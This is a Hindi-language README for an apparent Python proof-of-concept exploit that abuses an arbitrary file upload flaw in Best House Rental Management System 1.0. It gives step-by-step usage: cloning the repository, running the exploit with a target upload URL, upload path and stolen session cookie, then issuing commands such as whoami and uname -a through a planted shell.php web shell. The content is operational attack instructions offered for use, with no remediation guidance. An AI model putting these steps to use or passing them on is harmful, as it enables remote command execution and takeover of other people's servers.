
यह Python स्क्रिप्ट Best House Rental Management System 1.0 में मनमानी फ़ाइल अपलोड भेद्यता का फायदा उठाने का तरीका प्रदर्शित करती है। यह भेद्यता एक हमलावर को एक दुर्भावनापूर्ण फ़ाइल (जैसे कि PHP वेब शेल) अपलोड करने और लक्षित सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देती है।
रिपॉजिटरी क्लोन करें और डायरेक्टरी में नेविगेट करें:
git clone https://github.com/yourusername/house-rental-poc.git
cd house-rental-poc
निम्नलिखित पैरामीटर के साथ एक्सप्लॉइट चलाएं:
bash
python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>
target_url: भेद्य फ़ाइल अपलोड पृष्ठ का URL (जैसे, http:///rental/admin_class.php?view=save_settings) file_upload_path: वह पथ जहां अपलोड की गई फ़ाइलें संग्रहीत की जाती हैं (जैसे, http:///path/to/uploaded/files) session_cookie: प्रमाणित उपयोगकर्ता का सत्र कुकी
सफल होने पर, आप निम्नलिखित पर विज़िट करके लक्षित सर्वर पर कमांड निष्पादित करने में सक्षम होंगे:
bash
http://<file_upload_path>/shell.php?cmd=whoami
इसे whoami या uname -a जैसे कमांड चलाकर परीक्षण करें।
उदाहरण
python exploit_house_rental.py http://127.0.0.1/rental/admin_class.php?view=save_settings http://127.0.0.1/uploads/ SESSION_ID=123456789
यह कोड MIT लाइसेंस के तहत जारी किया गया है।